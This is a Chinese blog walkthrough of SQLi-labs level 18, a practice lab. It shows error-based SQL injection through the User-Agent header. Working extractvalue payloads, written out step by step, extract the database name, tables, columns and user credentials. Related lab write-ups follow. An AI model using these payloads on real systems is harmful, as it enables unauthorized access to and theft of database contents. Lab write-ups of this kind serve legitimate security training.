SQLI-labs-第十八关

最新推荐文章于 2025-07-13 15:46:49 发布
最新推荐文章于 2025-07-13 15:46:49 发布
阅读量1.3k 收藏 18
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 渗透学习之路 文章标签: 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54055099/article/details/139004117

目录

1、判断注入点

2、判断库名

3、判断表名

4、判断字段名

5、判断值

知识点:Http头部注入,报错注入

思路:

通过源代码可以得知,passwd和uname这两个地方使用了check_input函数,会过滤用户的输入,所以这里不是注入点,接下下面有一条insert语句,会对user-agent,进行查询,也会显示出来信息,我们可以在这里进行测试。

1、判断注入点

在user-agent,加上单引号’ ,爆出了数据库语句错误

通过分析报错信息,我们可以得知单引号后还有两个字段,加上注释符#看看

这里还是报错,但没有了后面的字段,我们改成  ‘,1,1)#

这里没有爆出数据库语句错误

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',1,extractvalue(1,concat(0x7e,database())))#

通过extractvalue函数可以爆出函数,说明user-agent这个字段存在单引号闭合错误的注入问题

2、判断库名

为了简化,看起来不那么复杂,我们把之前的user-agent内容删掉,改成

1‘,1,extractvalue(1,concat(0x7e,database())))#

3、判断表名

1',1,extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1))))#

通过修改limit的值,可以得到四个表为emails、referers、uagents、users

4、判断字段名

以uesrs表为例

1',1,extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1))))#

通过修改limit的值可以得知users表的三个字段为id、username、password

5、判断值

1',1,extractvalue(1,concat(0x7e,(select username from security.users limit 0,1))))#

1',1,extractvalue(1,concat(0x7e,(select password from security.users limit 0,1))))#

通过这种方式,就可以得到数据库的信息

这篇文章就先写到这里了,有哪些不足欢迎指正。

sqli.labs靶场(第18~22
喜欢创作各种技术类文章,希望可以帮到你
01-28 2198
sqli.labs靶场第18到22详情
Sqli-labs靶场第18详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1831
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
sqli-labs靶场第十八
gou1791241251的博客
12-28 2211
十八有点特殊,后台对输入的账号和密码都调用了函数进行过滤了,所以要转换注入方式,尝试去请求头里面修改信息。 可以尝试cookie注入,user-agent注入,refer字段注入。最终在user-agent字段发现注入点,因为输入单引号或双引号时有报错显示。 这次注入前提是输入的账号密码正确才会去执行user-agent的sql语句。在此次例子用了报错注入的方式进行爆表和爆库。 ...
sqli-labs第十八
最新发布
fristchoice的博客
07-13 244
本文详细介绍了使用SQLMap工具进行SQL注入攻击的完整流程:1)通过BurpSuite抓包发现潜在注入点;2)使用SQLMap识别注入点并获取数据库版本信息;3)查询获取所有数据库名;4)指定数据库查询表名;5)通过两种方式查看表数据(直接导出或分步查询列名和数据)。文中提供了具体操作命令,展示了从发现注入点到获取敏感数据的完整攻击链。该内容仅用于安全研究目的,未经授权测试属违法行为。
sqli-labs--------18
wyzhxhn的博客
11-10 1427
sql插入语句 User-Agent
sqli-labs基础篇 第18~22
Lucky小小吴的小屋
01-23 2658
sqli-labs基础篇 第18~22,主要学习内容:burp抓包、数据包修改
sql-labs靶场第十八测试报告
ccc_9wy的博客
10-19 3561
sql-labs第十八的测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程;报错注入;请求头注入。
sqli-labssqli-labs 靶场通(1-16)
m0_71944965的博客
09-02 716
🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】sqli-labs 靶场通(1-16)sqli-labs第一 sqli-labs第一 输入?id=1 正常 输入?id=1' 报错 输入?id=1'--+ 正常 判断有注入点且闭合方式是 ’ 使用and ‘1’='1判断他为字符型注入 ?id=1' order by 3--+ 正常 ?id=1' order by 4--+ 报错 判断回显位有三个。 id=0
sqli-labs 靶场 less-8、9、10 第八到第十详解:布尔注入,时间注入
Superstacks超全栈
06-09 1322
S接下来的工作就是之前使用的布尔注入流程一样,通过一个个字的判断来确定是否为想要的字符。如此便可以采用和上面类似的盲注入代码来进行。执行结果,成功完成注入(有一说一,代码请求量一多这脚本运行时间真的长!但是你会发现,在获取用户密码的时候会有很多空字符,这里是什么原因呢?输入注入代码,通过测试可知是使用双引号来进行闭合的查询语句。在这里我们无法看到错误信息,也不知道信息能否正常获取到。我们先尝试用语句来判断是否获取正常。的方式来进行,当输入下列参数时可以看到页面需要。通过以上信息来看可以确定,这一可以用。
SQLi-labs-Master(1-22)新手通宝典
Myosotis_LL的博客
05-18 3184
欢迎来到《SQLi-labs-Master新手通宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
用sqlmap工具打sqli-labs前20靶场
longnice666的博客
11-17 3383
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞。
SQL-labs的第18——http请求头注入(User-Agent)报错注入
qq_73393033的博客
07-21 622
并且,在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们这次使用extractvalue函数进行报错注入。我们在截取的数据包中的User-Agent上加上一个'。它显示了User-Agent,我们大胆猜测注入点在这里。通过改变mid函数的后面两个参数可以改变返回的内容。很显然,这里的数据没有显示完全。账号:admin ,密码:admin。这说明闭合方式就是'。
sqli-labs18(基于http头部报错盲注)通思路
zyh1588的博客
11-18 2688
小白回顾sql靶场第18
sqli-labs第十八~第二十二
yuqnqi的博客
05-13 1105
这几均为请求头注入,请求头记录的信息可以拼接到SQL语句上,User-Agent ,浏览器身份标识字符串Referer,表示浏览器访问的前一个页面,可以认为是之前访问页面的连接件浏览器带到了当前页面Accept ,可接受的响应内容类型(Content-Type)X-Forwarded-For, 可以用来表示http请求真实IPDate,发送该消息的日期和时间第十八暴库名爆表名爆字段名爆数据。
Sqlilabs-18
KAKA的博客
07-09 973
来到了 18 18 同样也是在 UPDATE 上面做手脚,但是限制更加严格,不仅对 username 对 password 也做了 check_input 再看看后台 SQL 语句的构造: insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)
sqli-labs(18)
2302_78903258的博客
05-25 409
这里最重要的是第5点,简单来说我们可以在user-agent里进行注入,但注入的参数要符合sql 语句的要求,所以我们在user-name里注入的参数有3个,并且要对uagent参数进行闭合。: 这是一个SQL查询语句,目的是从名为'users'的表格中选择用户名和密码与用户输入匹配的行。首先,随便输入账号密码,然后进行抓包,当页面显示uagent的时候,我们可以想到uagent注入。: 这是一个SQL插入语句,将用户代理、IP地址和用户名插入到名为'uagents'的表格中。
SQLI-LABS靶场18:Truncated incorrect DOUBLE value错误
sinat_39522506的博客
07-17 382
注入时,PAYLOAD正确,但是出现Truncated incorrect DOUBLE value:Mozilla/5.0 (Windows NT 10.0;sql版本换到5.5.29版本(5.5.x应该都可以)如果显示数据库连接失败,重启一下靶场。
Sqli-labs(1到18)
qq_61740845的博客
08-31 963
通过id=1'判断他url出存在注点闭合方式为单引号使用and1=2判断他使用数字注入通过id=1' order by 4 -- - 判断它可以回显三列通过id=0' union select 1,2,3 -- -判断只有2,3位可以回显。
sqli-labs-master第三十八
02-19
在探讨SQLi-Labs第38的解决方案时,重点在于理解如何利用宽字符绕过技术来执行SQL注入攻击。此卡涉及GET请求参数`id`中的输入验证机制存在漏洞[^1]。 对于Level 38而言,目标URL结构如下: ``` ...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值